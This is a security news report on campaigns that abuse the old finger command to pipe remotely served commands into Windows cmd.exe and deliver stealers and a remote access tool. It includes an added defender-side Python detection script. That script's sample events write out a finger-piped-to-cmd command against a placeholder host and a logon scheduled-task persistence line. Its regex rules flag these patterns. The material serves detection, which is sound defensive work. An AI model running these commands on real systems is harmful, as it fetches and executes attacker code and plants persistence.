- The “finger” command remains exploitable for remote code execution even after years of deprecation
- Attackers use batch scripts to pipe server responses directly to Windows command sessions
- Hidden Python programs are delivered via files disguised as harmless documents
The finger command is an old network lookup tool, originally used to obtain basic information about users on local or remote Unix systems and later on Windows.
It was gradually abandoned as modern authentication and lookup systems became standard, but this decade-old threat has apparently resurfaced quietly in malicious campaigns that trick users into running commands fetched over the obsolete protocol.
The method relies on retrieving text commands from a remote finger server and piping them straight into the standard Windows command processor, which executes them locally.
Old but still dangerous
Interest in this activity resurfaced when a researcher examined a batch script that sent a finger request to a remote server and piped the response into a live Windows command session.
That server has since gone offline, although additional samples with similar behavior were later linked to ongoing attacks.
One example involved a user who believed they were completing a human-verification step but in fact ran a command that connected to a remote address, with the output piped directly into a command processor session.
Although the server no longer responds, the previously captured output showed a sequence that created random directory paths, copied a system tool, and extracted a compressed archive disguised as a harmless document.
Inside that archive was a Python program that was launched via pythonw.exe and then contacted a remote server to confirm it had run.
A related batch file suggested that the package carried information-stealing functionality rather than a harmless test tool.
Another campaign used a similar request pattern but reached out to a different server and delivered almost identical automation.
Analysts noted that this variant looked for common reverse-engineering tools and monitoring utilities and exited if any were found, a level of environment awareness typical of prepared malware.
If no such utilities were found, the script downloaded a separate zip archive containing a known remote access tool used for unauthorized control sessions, then scheduled a task to start it every time the user logs in.
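As an added illustration (not code from the article or from the researchers it cites), the Python below runs defender-side checks over constructed Sysmon-style process-creation events for several stages of the chain described above: finger output piped into a command processor, a finger.exe remote query, pythonw.exe launched from a user-writable path, and a logon-triggered scheduled task pointing there. The field names, paths and hostnames are assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events (sample data, not logs from the campaign above).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd /c finger user@finger.example.invalid | cmd"},
    {"Image": r"C:\Windows\System32\finger.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"finger user@finger.example.invalid"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\k3x9\pythonw.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pythonw.exe loader.py"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /sc onlogon /tn Updater /tr C:\Users\alice\AppData\Local\Temp\k3x9\run.bat"},
    {"Image": r"C:\Program Files\Python312\pythonw.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"pythonw.exe report.py"},  # benign: legitimate install location, no match expected
]

# Directories an unprivileged user can write to; the chain above staged its payload in random paths like these.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.I)

def _image_is(event, name):
    return event["Image"].lower().endswith("\\" + name)

# Each rule is (name, predicate over one event); rules cover several stages of the chain described in the article.
RULES = [
    ("finger output piped into a command processor",
     lambda e: re.search(r"\bfinger(\.exe)?\b.*\|\s*(cmd|powershell)", e["CommandLine"], re.I) is not None),
    ("finger.exe remote query (rare on modern workstations)",
     lambda e: _image_is(e, "finger.exe") and "@" in e["CommandLine"]),
    ("pythonw.exe launched from a user-writable path",
     lambda e: _image_is(e, "pythonw.exe") and USER_WRITABLE.search(e["Image"]) is not None),
    ("logon-triggered scheduled task pointing at a user-writable path",
     lambda e: _image_is(e, "schtasks.exe")
     and re.search(r"/create\b.*/sc\s+onlogon", e["CommandLine"], re.I) is not None
     and USER_WRITABLE.search(e["CommandLine"]) is not None),
]

def analyze(events):
    """Return {event_index: [matched rule names]} for every event that trips at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        matched = [name for name, pred in RULES if pred(ev)]
        if matched:
            hits[i] = matched
    return hits

if __name__ == "__main__":
    for idx, names in analyze(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}", *names, sep="\n   -> ")
```

Any single rule on its own is noisy on a developer workstation; the signal is several of them firing from the same cmd.exe parent within a short window.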
This abuse appears to involve a single actor, although unwitting victims continue to report similar incidents.
Users are reminded that secure computing still requires up-to-date antivirus software, reliable malware-removal practices, and a properly configured firewall.
It may seem strange that a legacy lookup tool still poses a risk, but older protocols can provide real entry points when combined with social engineering.
Via BleepingComputer
